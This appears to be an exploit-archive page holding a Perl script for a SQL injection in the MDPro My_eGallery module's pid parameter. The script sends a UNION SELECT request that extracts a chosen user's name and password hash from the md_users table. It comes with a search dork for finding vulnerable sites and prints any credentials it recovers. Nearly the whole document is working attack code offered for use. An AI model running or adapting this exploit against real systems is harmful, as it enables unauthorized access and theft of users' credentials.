[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MDPro Module My_eGallery (pid) Remote SQL Injection Exploit
# Published : 2009-02-23
# Author : StAkeR
# Previous Title : taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
# Next Title : phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability


#!/usr/bin/perl

<<read;

    MDPro Module My_eGallery Remote SQL Injection Exploit
    by s3rg3770 && yeat - staker[at]hotmail[dot]it
    
    dork: inurl:module=My_eGallery pid
    note: works regardless of php.ini settings.
    
read

use IO::Socket;


my ($host,$path,$id) = @ARGV;


if (@ARGV != 3) 
{
       print "n+-------------------------------------------------------+n".
             "r| MDPro Module My_eGallery Remote SQL Injection Exploit |n".
             "r+-------------------------------------------------------+n".
             "rby yeat - staker[at]hotmail[dot]itn".
             "nUsage: perl $0 host /path/ idn".
             "nhost: localhostn".
             "rpath: /mdpro/n".
             "rid: 2n";
       exit;
}         
else
{      
       my ($packet,$inject,$content);
       
       $inject = "index.php?module=My_eGallery&do=showpic&pid=-1".
                 "/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0".
                 ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7".
                 "230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0".
                 ",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*"; 
                 
       $socket = new IO::Socket::INET(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp'
                                     ) or die $!;
                                        
       
       $packet .= "GET /$inject HTTP/1.1rn";
       $packet .= "Host: $hostrn";
       $packet .= "User-Agent: Lynx (textmode)rn";
       $packet .= "Connection: closernrn";
       
       $socket->send($packet);
       
       while (<$socket>) {
          $content .= $_;
       }
       
       close($socket);
       
       if ($content =~ /<r0x>(.+?)<r0x>/i) {
          print "Exploit Successful: $1n";
       }
       else {
          print "Exploit Failed.n";
       }      
}       

# www.Syue.com [2009-02-23]